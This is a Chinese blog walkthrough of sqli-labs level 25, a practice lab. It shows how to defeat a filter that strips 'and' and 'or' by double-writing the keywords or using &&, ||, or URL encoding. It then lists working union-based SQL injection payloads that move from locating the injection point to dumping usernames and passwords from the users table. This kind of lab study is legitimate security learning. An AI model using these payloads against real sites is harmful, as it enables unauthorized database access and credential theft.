当前位置：首页 > news >正文

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)

news 2026/5/20 2:47:01

文章目录

前言
一、回顾上一关知识点
二、靶场第二十五关通关思路
- 1、判断注入点
- 2、爆字段个数
- 3、爆显位位置
- 4、爆数据库名
- 5、爆数据库表名
- 6、爆数据库列名
- 7、爆数据库数据
总结

前言

此文章只用于学习和反思巩固sql注入知识，禁止用于做非法攻击。注意靶场是可以练习的平台，不能随意去尚未授权的网站做渗透测试！！！

一、回顾上一关知识点

上一关是过滤了注释符，导致单引号不能被过滤掉而闭合，得通过构造and '1'='1 和or '1'='1在payload后面才能成功把多余的单引号闭合。这一关是过滤了and和or，让我们看看如何绕过。

二、靶场第二十五关通关思路

1、判断注入点
2、爆字段个数
3、爆显位位置
4、爆数据库名
5、爆数据库表名
6、爆数据库列名
7、爆数据库数据

1、判断注入点

打开二十五关，发现是get提交的注入类型，老规矩用万能语句and 1=1和 and 1=2测试，发现回显正常，还发现语句返回页面的时候and被过滤了，这里说明这一关是过滤掉and和or了.( 如图所示)
在这里插入图片描述
为了进一步猜想是不是过滤了and和or我们看看源码，发现and和or被替换为空了(如图所示)

这里我们有三种方法绕过and，
第一种是双写and
因为它把and替换为空，而且只过滤一次。如果是anandd的话经过后端过滤应该变成and。
第二种是利用逻辑运算符
and对应的机器语言是&&，or对应的是||
第三种是用url编码
and对应的机器语言是&&，若&&无法绕过，可以试着利用&的url编码绕过，&&url编码为%26%26。当然&&能绕过更好。
绕过的方法有很多这里不多举例，这里我用双写绕过。
最终发现是单引号闭合，payload为(如图所示)

id=1' anandd 1=1--+

id=1' anandd 1=2--+

在这里插入图片描述

2、爆字段个数

发现4的时候报错，说明只有三个字段
payload为

id=1' oorrder by 4--+

在这里插入图片描述

3、爆显位位置

payload为

id=1' union select 1,2,3--+

在这里插入图片描述

4、爆数据库名

payload为

id=-1' union select 1,user(),database()--+

在这里插入图片描述

5、爆数据库表名

payload为

id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

在这里插入图片描述

6、爆数据库列名

payload为

id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name="users"--+

在这里插入图片描述

7、爆数据库数据

payload为

id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users --+

在这里插入图片描述

总结

这一关是过滤了and和or，过滤的方法很多，有双写、url编码、&&绕过等等。此文章是小白自己为了巩固sql注入而写的，大佬路过请多指教！

文章目录

前言

一、回顾上一关知识点

二、靶场第二十五关通关思路

1、判断注入点

2、爆字段个数

3、爆显位位置

4、爆数据库名

5、爆数据库表名

6、爆数据库列名

7、爆数据库数据

总结

相关文章：